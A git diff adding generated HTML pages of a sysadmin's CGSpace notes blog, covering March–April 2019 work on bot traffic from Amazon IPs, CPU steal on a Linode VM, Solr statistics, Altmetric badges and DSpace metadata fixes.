+<pre tabindex="0"><code>$ grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=(18.195.78.144|18.196.196.108)&#39; dspace.log.2019-03-26 | sort | uniq | wc -l
+937
+</code></pre><ul>
+<li>I will add their IPs to the list of bot IPs in nginx so I can tag them as bots to let Tomcat&rsquo;s Crawler Session Manager Valve to force them to re-use their session</li>
+<li>Another user agent behaving badly in Colombia is &ldquo;GuzzleHttp/6.3.3 curl/7.47.0 PHP/7.0.30-0ubuntu0.16.04.1&rdquo;</li>
+<li>I will add curl to the Tomcat Crawler Session Manager because anyone using curl is most likely an automated read-only request</li>
+<li>I will add GuzzleHttp to the nginx badbots rate limiting, because it is making requests to dynamic Discovery pages</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep 45.5.184.72 | grep -E &#34;26/Mar/2019:&#34; | grep -E &#39;(discover|browse)&#39; | wc -l                                        
+119
+</code></pre><ul>
+<li>What&rsquo;s strange is that I can&rsquo;t see any of their requests in the DSpace log&hellip;</li>
+</ul>
+<pre tabindex="0"><code>$ grep -I -c 45.5.184.72 dspace.log.2019-03-26 
+0
+</code></pre><h2 id="2019-03-28">2019-03-28</h2>
+<ul>
+<li>Run the corrections and deletions to AGROVOC (dc.subject) on DSpace Test and CGSpace, and then start a full re-index of Discovery</li>
+<li>What the hell is going on with this CTA publication?</li>
+</ul>
+<pre tabindex="0"><code># grep Spore-192-EN-web.pdf /var/log/nginx/access.log | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n
+      1 37.48.65.147
+      1 80.113.172.162
+      2 108.174.5.117
+      2 83.110.14.208
+      4 18.196.8.188
+     84 18.195.78.144
+    644 18.194.46.84
+   1144 18.196.196.108
+</code></pre><ul>
+<li>None of these 18.x.x.x IPs specify a user agent and they are all on Amazon!</li>
+<li>Shortly after I started the re-indexing UptimeRobot began to complain that CGSpace was down, then up, then down, then up&hellip;</li>
+<li>I see the load on the server is about 10.0 again for some reason though I don&rsquo;t know WHAT is causing that load
+<ul>
+<li>It could be the CPU steal metric, as if Linode has oversold the CPU resources on this VM host&hellip;</li>
+</ul>
+</li>
+<li>Here are the Munin graphs of CPU usage for the last day, week, and year:</li>
+</ul>
+<p><img src="/cgspace-notes/2019/03/cpu-day-fs8.png" alt="CPU day"></p>
+<p><img src="/cgspace-notes/2019/03/cpu-week-fs8.png" alt="CPU week"></p>
+<p><img src="/cgspace-notes/2019/03/cpu-year-fs8.png" alt="CPU year"></p>
+<ul>
+<li>What&rsquo;s clear from this is that some other VM on our host has heavy usage for about four hours at 6AM and 6PM and that during that time the load on our server spikes
+<ul>
+<li>CPU steal has drastically increased since March 25th</li>
+<li>It might be time to move to a dedicated CPU VM instances, or even real servers</li>
+<li>For now I just sent a support ticket to bring this to Linode&rsquo;s attention</li>
+</ul>
+</li>
+<li>In other news, I see that it&rsquo;s not even the end of the month yet and we have 3.6 million hits already:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Mar/2019&#34;
+3654911
+</code></pre><ul>
+<li>In other other news I see that DSpace has no statistics for years before 2019 currently, yet when I connect to Solr I see all the cores up</li>
+</ul>
+<h2 id="2019-03-29">2019-03-29</h2>
+<ul>
+<li>Sent Linode more information from <code>top</code> and <code>iostat</code> about the resource usage on linode18
+<ul>
+<li>Linode agreed that the CPU steal percentage was high and migrated the VM to a new host</li>
+<li>Now the resource contention is much lower according to <code>iostat 1 10</code></li>
+</ul>
+</li>
+<li>I restarted Tomcat to see if I could fix the missing pre-2019 statistics (yes it fixed it)
+<ul>
+<li>Though I looked in the Solr Admin UI and noticed a logging dashboard that show warnings and errors, and the first concerning Solr cores was on 3/27/2019, 8:50:35 AM so I should check the logs around that time to see if something happened</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-03-31">2019-03-31</h2>
+<ul>
+<li>After a few days of the CGSpace VM (linode18) being migrated to a new host the CPU steal is gone and the site is much more responsive</li>
+</ul>
+<p><img src="/cgspace-notes/2019/03/cpu-week-migrated.png" alt="linode18 CPU usage after migration"></p>
+<ul>
+<li>It is frustrating to see that the load spikes for own own legitimate load on the server were <em>very</em> aggravated and drawn out by the contention for CPU on this host</li>
+<li>We had 4.2 million hits this month according to the web server logs:</li>
+</ul>
+<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Mar/2019&#34;
+4218841
+
+real    0m26.609s
+user    0m31.657s
+sys     0m2.551s
+</code></pre><ul>
+<li>Interestingly, now that the CPU steal is not an issue the REST API is ten seconds faster than it was in <a href="/cgspace-notes/2018-10/">2018-10</a>:</li>
+</ul>
+<pre tabindex="0"><code>$ time http --print h &#39;https://cgspace.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&amp;limit=100&amp;offset=0&#39;
+...
+0.33s user 0.07s system 2% cpu 17.167 total
+0.27s user 0.04s system 1% cpu 16.643 total
+0.24s user 0.09s system 1% cpu 17.764 total
+0.25s user 0.06s system 1% cpu 15.947 total
+</code></pre><ul>
+<li>I did some research on dedicated servers to potentially replace Linode for CGSpace stuff and it seems Hetzner is pretty good
+<ul>
+<li>This <a href="https://www.hetzner.com/dedicated-rootserver/px62-nvme">PX62-NVME system</a> looks great an is half the price of our current Linode instance</li>
+<li>It has 64GB of ECC RAM, six core Xeon processor from 2018, and 2x960GB NVMe storage</li>
+<li>The alternative of staying with Linode and using dedicated CPU instances with added block storage gets expensive quickly if we want to keep more than 16GB of RAM (do we?)
+<ul>
+<li>Regarding RAM, our JVM heap is 8GB and we leave the rest of the system&rsquo;s 32GB of RAM to PostgreSQL and Solr buffers</li>
+<li>Seeing as we have 56GB of Solr data it might be better to have more RAM in order to keep more of it in memory</li>
+<li>Also, I know that the Linode block storage is a major bottleneck for Solr indexing</li>
+</ul>
+</li>
+</ul>
+</li>
+<li>Looking at the weird issue with shitloads of downloads on the <a href="https://cgspace.cgiar.org/handle/10568/100289">CTA item</a> again</li>
+<li>The item was added on 2019-03-13 and these three IPs have attempted to download the item&rsquo;s bitstream 43,000 times since it was added eighteen days ago:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.{2..17}.gz | grep &#39;Spore-192-EN-web.pdf&#39; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 5
+     42 196.43.180.134
+    621 185.247.144.227
+   8102 18.194.46.84
+  14927 18.196.196.108
+  20265 18.195.78.144
+</code></pre><ul>
+<li>I will send a mail to CTA to ask if they know these IPs</li>
+<li>I wonder if the Cocoon errors we had earlier this month were inadvertently related to the CPU steal issue&hellip; I see very low occurrences of the &ldquo;Can not load requested doc&rdquo; error in the Cocoon logs the past few days</li>
+<li>Helping Perttu debug some issues with the REST API on DSpace Test
+<ul>
+<li>He was getting an HTTP 500 when working with a collection, and I see the following in the DSpace log:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>2019-03-29 09:10:07,311 ERROR org.dspace.rest.Resource @ Could not delete collection(id=1451), AuthorizeException. Message: org.dspace.authorize.AuthorizeException: Authorization denied for action ADMIN on COLLECTION:1451 by user 9492
+</code></pre><ul>
+<li>IWMI people emailed to ask why two items with the same DOI don&rsquo;t have the same Altmetric score:
+<ul>
+<li><a href="https://cgspace.cgiar.org/handle/10568/89846">https://cgspace.cgiar.org/handle/10568/89846</a> (Bioversity)</li>
+<li><a href="https://cgspace.cgiar.org/handle/10568/89975">https://cgspace.cgiar.org/handle/10568/89975</a> (CIAT)</li>
+</ul>
+</li>
+<li>Only the second one has an Altmetric score (208)</li>
+<li>I tweeted handles for both of them to see if Altmetric will pick it up
+<ul>
+<li>About twenty minutes later the Altmetric score for the second one had increased from 208 to 209, but the first still had a score of zero</li>
+<li>Interestingly, if I look at the network requests during page load for the first item I see the following response payload for the Altmetric API request:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>_altmetric.embed_callback({&#34;title&#34;:&#34;Distilling the role of ecosystem services in the Sustainable Development Goals&#34;,&#34;doi&#34;:&#34;10.1016/j.ecoser.2017.10.010&#34;,&#34;tq&#34;:[&#34;Progress on 12 of 17 #SDGs rely on #ecosystemservices - new paper co-authored by a number of&#34;,&#34;Distilling the role of ecosystem services in the Sustainable Development Goals - new paper by @SNAPPartnership researchers&#34;,&#34;How do #ecosystemservices underpin the #SDGs? Our new paper starts counting the ways. Check it out in the link below!&#34;,&#34;Excellent paper about the contribution of #ecosystemservices to SDGs&#34;,&#34;So great to work with amazing collaborators&#34;],&#34;altmetric_jid&#34;:&#34;521611533cf058827c00000a&#34;,&#34;issns&#34;:[&#34;2212-0416&#34;],&#34;journal&#34;:&#34;Ecosystem Services&#34;,&#34;cohorts&#34;:{&#34;sci&#34;:58,&#34;pub&#34;:239,&#34;doc&#34;:3,&#34;com&#34;:2},&#34;context&#34;:{&#34;all&#34;:{&#34;count&#34;:12732768,&#34;mean&#34;:7.8220956572788,&#34;rank&#34;:56146,&#34;pct&#34;:99,&#34;higher_than&#34;:12676701},&#34;journal&#34;:{&#34;count&#34;:549,&#34;mean&#34;:7.7567299270073,&#34;rank&#34;:2,&#34;pct&#34;:99,&#34;higher_than&#34;:547},&#34;similar_age_3m&#34;:{&#34;count&#34;:386919,&#34;mean&#34;:11.573702536454,&#34;rank&#34;:3299,&#34;pct&#34;:99,&#34;higher_than&#34;:383619},&#34;similar_age_journal_3m&#34;:{&#34;count&#34;:28,&#34;mean&#34;:9.5648148148148,&#34;rank&#34;:1,&#34;pct&#34;:96,&#34;higher_than&#34;:27}},&#34;authors&#34;:[&#34;Sylvia L.R. Wood&#34;,&#34;Sarah K. Jones&#34;,&#34;Justin A. Johnson&#34;,&#34;Kate A. Brauman&#34;,&#34;Rebecca Chaplin-Kramer&#34;,&#34;Alexander Fremier&#34;,&#34;Evan Girvetz&#34;,&#34;Line J. Gordon&#34;,&#34;Carrie V. Kappel&#34;,&#34;Lisa Mandle&#34;,&#34;Mark Mulligan&#34;,&#34;Patrick O&#39;Farrell&#34;,&#34;William K. Smith&#34;,&#34;Louise Willemen&#34;,&#34;Wei Zhang&#34;,&#34;Fabrice A. DeClerck&#34;],&#34;type&#34;:&#34;article&#34;,&#34;handles&#34;:[&#34;10568/89975&#34;,&#34;10568/89846&#34;],&#34;handle&#34;:&#34;10568/89975&#34;,&#34;altmetric_id&#34;:29816439,&#34;schema&#34;:&#34;1.5.4&#34;,&#34;is_oa&#34;:false,&#34;cited_by_posts_count&#34;:377,&#34;cited_by_tweeters_count&#34;:302,&#34;cited_by_fbwalls_count&#34;:1,&#34;cited_by_gplus_count&#34;:1,&#34;cited_by_policies_count&#34;:2,&#34;cited_by_accounts_count&#34;:306,&#34;last_updated&#34;:1554039125,&#34;score&#34;:208.65,&#34;history&#34;:{&#34;1y&#34;:54.75,&#34;6m&#34;:10.35,&#34;3m&#34;:5.5,&#34;1m&#34;:5.5,&#34;1w&#34;:1.5,&#34;6d&#34;:1.5,&#34;5d&#34;:1.5,&#34;4d&#34;:1.5,&#34;3d&#34;:1.5,&#34;2d&#34;:1,&#34;1d&#34;:1,&#34;at&#34;:208.65},&#34;url&#34;:&#34;http://dx.doi.org/10.1016/j.ecoser.2017.10.010&#34;,&#34;added_on&#34;:1512153726,&#34;published_on&#34;:1517443200,&#34;readers&#34;:{&#34;citeulike&#34;:0,&#34;mendeley&#34;:248,&#34;connotea&#34;:0},&#34;readers_count&#34;:248,&#34;images&#34;:{&#34;small&#34;:&#34;https://badges.altmetric.com/?size=64&amp;score=209&amp;types=tttttfdg&#34;,&#34;medium&#34;:&#34;https://badges.altmetric.com/?size=100&amp;score=209&amp;types=tttttfdg&#34;,&#34;large&#34;:&#34;https://badges.altmetric.com/?size=180&amp;score=209&amp;types=tttttfdg&#34;},&#34;details_url&#34;:&#34;http://www.altmetric.com/details.php?citation_id=29816439&#34;})
+</code></pre><ul>
+<li>The response paylod for the second one is the same:</li>
+</ul>
+<pre tabindex="0"><code>_altmetric.embed_callback({&#34;title&#34;:&#34;Distilling the role of ecosystem services in the Sustainable Development Goals&#34;,&#34;doi&#34;:&#34;10.1016/j.ecoser.2017.10.010&#34;,&#34;tq&#34;:[&#34;Progress on 12 of 17 #SDGs rely on #ecosystemservices - new paper co-authored by a number of&#34;,&#34;Distilling the role of ecosystem services in the Sustainable Development Goals - new paper by @SNAPPartnership researchers&#34;,&#34;How do #ecosystemservices underpin the #SDGs? Our new paper starts counting the ways. Check it out in the link below!&#34;,&#34;Excellent paper about the contribution of #ecosystemservices to SDGs&#34;,&#34;So great to work with amazing collaborators&#34;],&#34;altmetric_jid&#34;:&#34;521611533cf058827c00000a&#34;,&#34;issns&#34;:[&#34;2212-0416&#34;],&#34;journal&#34;:&#34;Ecosystem Services&#34;,&#34;cohorts&#34;:{&#34;sci&#34;:58,&#34;pub&#34;:239,&#34;doc&#34;:3,&#34;com&#34;:2},&#34;context&#34;:{&#34;all&#34;:{&#34;count&#34;:12732768,&#34;mean&#34;:7.8220956572788,&#34;rank&#34;:56146,&#34;pct&#34;:99,&#34;higher_than&#34;:12676701},&#34;journal&#34;:{&#34;count&#34;:549,&#34;mean&#34;:7.7567299270073,&#34;rank&#34;:2,&#34;pct&#34;:99,&#34;higher_than&#34;:547},&#34;similar_age_3m&#34;:{&#34;count&#34;:386919,&#34;mean&#34;:11.573702536454,&#34;rank&#34;:3299,&#34;pct&#34;:99,&#34;higher_than&#34;:383619},&#34;similar_age_journal_3m&#34;:{&#34;count&#34;:28,&#34;mean&#34;:9.5648148148148,&#34;rank&#34;:1,&#34;pct&#34;:96,&#34;higher_than&#34;:27}},&#34;authors&#34;:[&#34;Sylvia L.R. Wood&#34;,&#34;Sarah K. Jones&#34;,&#34;Justin A. Johnson&#34;,&#34;Kate A. Brauman&#34;,&#34;Rebecca Chaplin-Kramer&#34;,&#34;Alexander Fremier&#34;,&#34;Evan Girvetz&#34;,&#34;Line J. Gordon&#34;,&#34;Carrie V. Kappel&#34;,&#34;Lisa Mandle&#34;,&#34;Mark Mulligan&#34;,&#34;Patrick O&#39;Farrell&#34;,&#34;William K. Smith&#34;,&#34;Louise Willemen&#34;,&#34;Wei Zhang&#34;,&#34;Fabrice A. DeClerck&#34;],&#34;type&#34;:&#34;article&#34;,&#34;handles&#34;:[&#34;10568/89975&#34;,&#34;10568/89846&#34;],&#34;handle&#34;:&#34;10568/89975&#34;,&#34;altmetric_id&#34;:29816439,&#34;schema&#34;:&#34;1.5.4&#34;,&#34;is_oa&#34;:false,&#34;cited_by_posts_count&#34;:377,&#34;cited_by_tweeters_count&#34;:302,&#34;cited_by_fbwalls_count&#34;:1,&#34;cited_by_gplus_count&#34;:1,&#34;cited_by_policies_count&#34;:2,&#34;cited_by_accounts_count&#34;:306,&#34;last_updated&#34;:1554039125,&#34;score&#34;:208.65,&#34;history&#34;:{&#34;1y&#34;:54.75,&#34;6m&#34;:10.35,&#34;3m&#34;:5.5,&#34;1m&#34;:5.5,&#34;1w&#34;:1.5,&#34;6d&#34;:1.5,&#34;5d&#34;:1.5,&#34;4d&#34;:1.5,&#34;3d&#34;:1.5,&#34;2d&#34;:1,&#34;1d&#34;:1,&#34;at&#34;:208.65},&#34;url&#34;:&#34;http://dx.doi.org/10.1016/j.ecoser.2017.10.010&#34;,&#34;added_on&#34;:1512153726,&#34;published_on&#34;:1517443200,&#34;readers&#34;:{&#34;citeulike&#34;:0,&#34;mendeley&#34;:248,&#34;connotea&#34;:0},&#34;readers_count&#34;:248,&#34;images&#34;:{&#34;small&#34;:&#34;https://badges.altmetric.com/?size=64&amp;score=209&amp;types=tttttfdg&#34;,&#34;medium&#34;:&#34;https://badges.altmetric.com/?size=100&amp;score=209&amp;types=tttttfdg&#34;,&#34;large&#34;:&#34;https://badges.altmetric.com/?size=180&amp;score=209&amp;types=tttttfdg&#34;},&#34;details_url&#34;:&#34;http://www.altmetric.com/details.php?citation_id=29816439&#34;})
+</code></pre><ul>
+<li>Very interesting to see this in the response:</li>
+</ul>
+<pre tabindex="0"><code>&#34;handles&#34;:[&#34;10568/89975&#34;,&#34;10568/89846&#34;],
+&#34;handle&#34;:&#34;10568/89975&#34;
+</code></pre><ul>
+<li>On further inspection I see that the Altmetric explorer pages for each of these Handles is actually doing the right thing:
+<ul>
+<li><a href="https://www.altmetric.com/explorer/highlights?identifier=10568%2F89846">https://www.altmetric.com/explorer/highlights?identifier=10568%2F89846</a></li>
+<li><a href="https://www.altmetric.com/explorer/highlights?identifier=10568%2F89975">https://www.altmetric.com/explorer/highlights?identifier=10568%2F89975</a></li>
+</ul>
+</li>
+<li>So it&rsquo;s likely the DSpace Altmetric badge code that is deciding not to show the badge</li>
+</ul>
+<!-- raw HTML omitted -->
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2019-04/index.html b/docs/2019-04/index.html
new file mode 100644
index 000000000..93269e27c
--- /dev/null
+++ b/docs/2019-04/index.html
@@ -0,0 +1,1353 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="April, 2019" />
+<meta property="og:description" content="2019-04-01
+
+Meeting with AgroKnow to discuss CGSpace, ILRI data, AReS, GARDIAN, etc
+
+They asked if we had plans to enable RDF support in CGSpace
+
+
+There have been 4,400 more downloads of the CTA Spore publication from those strange Amazon IP addresses today
+
+I suspected that some might not be successful, because the stats show less, but today they were all HTTP 200!
+
+
+
+# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &#39;Spore-192-EN-web.pdf&#39; | grep -E &#39;(18.196.196.108|18.195.78.144|18.195.218.6)&#39; | awk &#39;{print $9}&#39; | sort | uniq -c | sort -n | tail -n 5
+   4432 200
+
+In the last two weeks there have been 47,000 downloads of this same exact PDF by these three IP addresses
+Apply country and region corrections and deletions on DSpace Test and CGSpace:
+
+$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.country -m 228 -t ACTION -d
+$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.region -m 231 -t action -d
+$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 228 -f cg.coverage.country -d
+$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 231 -f cg.coverage.region -d
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2019-04/" />
+<meta property="article:published_time" content="2019-04-01T09:00:43+03:00" />
+<meta property="article:modified_time" content="2021-08-18T15:29:31+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="April, 2019"/>
+<meta name="twitter:description" content="2019-04-01
+
+Meeting with AgroKnow to discuss CGSpace, ILRI data, AReS, GARDIAN, etc
+
+They asked if we had plans to enable RDF support in CGSpace
+
+
+There have been 4,400 more downloads of the CTA Spore publication from those strange Amazon IP addresses today
+
+I suspected that some might not be successful, because the stats show less, but today they were all HTTP 200!
+
+
+
+# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &#39;Spore-192-EN-web.pdf&#39; | grep -E &#39;(18.196.196.108|18.195.78.144|18.195.218.6)&#39; | awk &#39;{print $9}&#39; | sort | uniq -c | sort -n | tail -n 5
+   4432 200
+
+In the last two weeks there have been 47,000 downloads of this same exact PDF by these three IP addresses
+Apply country and region corrections and deletions on DSpace Test and CGSpace:
+
+$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.country -m 228 -t ACTION -d
+$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.region -m 231 -t action -d
+$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 228 -f cg.coverage.country -d
+$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 231 -f cg.coverage.region -d
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "April, 2019",
+  "url": "https://alanorth.github.io/cgspace-notes/2019-04/",
+  "wordCount": "6778",
+  "datePublished": "2019-04-01T09:00:43+03:00",
+  "dateModified": "2021-08-18T15:29:31+03:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2019-04/">
+
+    <title>April, 2019 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2019-04/">April, 2019</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2019-04-01T09:00:43+03:00">Mon Apr 01, 2019</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2019-04-01">2019-04-01</h2>
+<ul>
+<li>Meeting with AgroKnow to discuss CGSpace, ILRI data, AReS, GARDIAN, etc
+<ul>
+<li>They asked if we had plans to enable RDF support in CGSpace</li>
+</ul>
+</li>
+<li>There have been 4,400 more downloads of the CTA Spore publication from those strange Amazon IP addresses today
+<ul>
+<li>I suspected that some might not be successful, because the stats show less, but today they were all HTTP 200!</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &#39;Spore-192-EN-web.pdf&#39; | grep -E &#39;(18.196.196.108|18.195.78.144|18.195.218.6)&#39; | awk &#39;{print $9}&#39; | sort | uniq -c | sort -n | tail -n 5
+   4432 200
+</code></pre><ul>
+<li>In the last two weeks there have been 47,000 downloads of this <em>same exact PDF</em> by these three IP addresses</li>
+<li>Apply country and region corrections and deletions on DSpace Test and CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.country -m 228 -t ACTION -d
+$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.region -m 231 -t action -d
+$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 228 -f cg.coverage.country -d
+$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 231 -f cg.coverage.region -d
+</code></pre><h2 id="2019-04-02">2019-04-02</h2>
+<ul>
+<li>CTA says the Amazon IPs are AWS gateways for real user traffic</li>
+<li>I was trying to add Felix Shaw&rsquo;s account back to the Administrators group on DSpace Test, but I couldn&rsquo;t find his name in the user search of the groups page
+<ul>
+<li>If I searched for &ldquo;Felix&rdquo; or &ldquo;Shaw&rdquo; I saw other matches, included one for his personal email address!</li>
+<li>I ended up finding him via searching for his email address</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-04-03">2019-04-03</h2>
+<ul>
+<li>Maria from Bioversity emailed me a list of new ORCID identifiers for their researchers so I will add them to our controlled vocabulary
+<ul>
+<li>First I need to extract the ones that are unique from their list compared to our existing one:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/bioversity.txt | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort -u &gt; /tmp/2019-04-03-orcid-ids.txt
+</code></pre><ul>
+<li>We currently have 1177 unique ORCID identifiers, and this brings our total to 1237!</li>
+<li>Next I will resolve all their names using my <code>resolve-orcids.py</code> script:</li>
+</ul>
+<pre tabindex="0"><code>$ ./resolve-orcids.py -i /tmp/2019-04-03-orcid-ids.txt -o 2019-04-03-orcid-ids.txt -d
+</code></pre><ul>
+<li>After that I added the XML formatting, formatted the file with tidy, and sorted the names in vim</li>
+<li>One user&rsquo;s name has changed so I will update those using my <code>fix-metadata-values.py</code> script:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2019-04-03-update-orcids.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.creator.id -m 240 -t correct -d
+</code></pre><ul>
+<li>I created a pull request and merged the changes to the <code>5_x-prod</code> branch (<a href="https://github.com/ilri/DSpace/pull/417">#417</a>)</li>
+<li>A few days ago I noticed some weird update process for the statistics-2018 Solr core and I see it&rsquo;s still going:</li>
+</ul>
+<pre tabindex="0"><code>2019-04-03 16:34:02,262 INFO  org.dspace.statistics.SolrLogger @ Updating : 1754500/21701 docs in http://localhost:8081/solr//statistics-2018
+</code></pre><ul>
+<li>Interestingly, there are 5666 occurences, and they are mostly for the 2018 core:</li>
+</ul>
+<pre tabindex="0"><code>$ grep &#39;org.dspace.statistics.SolrLogger @ Updating&#39; /home/cgspace.cgiar.org/log/dspace.log.2019-04-03 | awk &#39;{print $11}&#39; | sort | uniq -c
+      1 
+      3 http://localhost:8081/solr//statistics-2017
+   5662 http://localhost:8081/solr//statistics-2018
+</code></pre><ul>
+<li>I will have to keep an eye on it because nothing should be updating 2018 stats in 2019&hellip;</li>
+</ul>
+<h2 id="2019-04-05">2019-04-05</h2>
+<ul>
+<li>Uptime Robot reported that CGSpace (linode18) went down tonight</li>
+<li>I see there are lots of PostgreSQL connections:</li>
+</ul>
+<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
+      5 dspaceApi
+     10 dspaceCli
+    250 dspaceWeb
+</code></pre><ul>
+<li>I still see those weird messages about updating the statistics-2018 Solr core:</li>
+</ul>
+<pre tabindex="0"><code>2019-04-05 21:06:53,770 INFO  org.dspace.statistics.SolrLogger @ Updating : 2444600/21697 docs in http://localhost:8081/solr//statistics-2018
+</code></pre><ul>
+<li>Looking at <code>iostat 1 10</code> I also see some CPU steal has come back, and I can confirm it by looking at the Munin graphs:</li>
+</ul>
+<p><img src="/cgspace-notes/2019/04/cpu-week.png" alt="CPU usage week"></p>
+<ul>
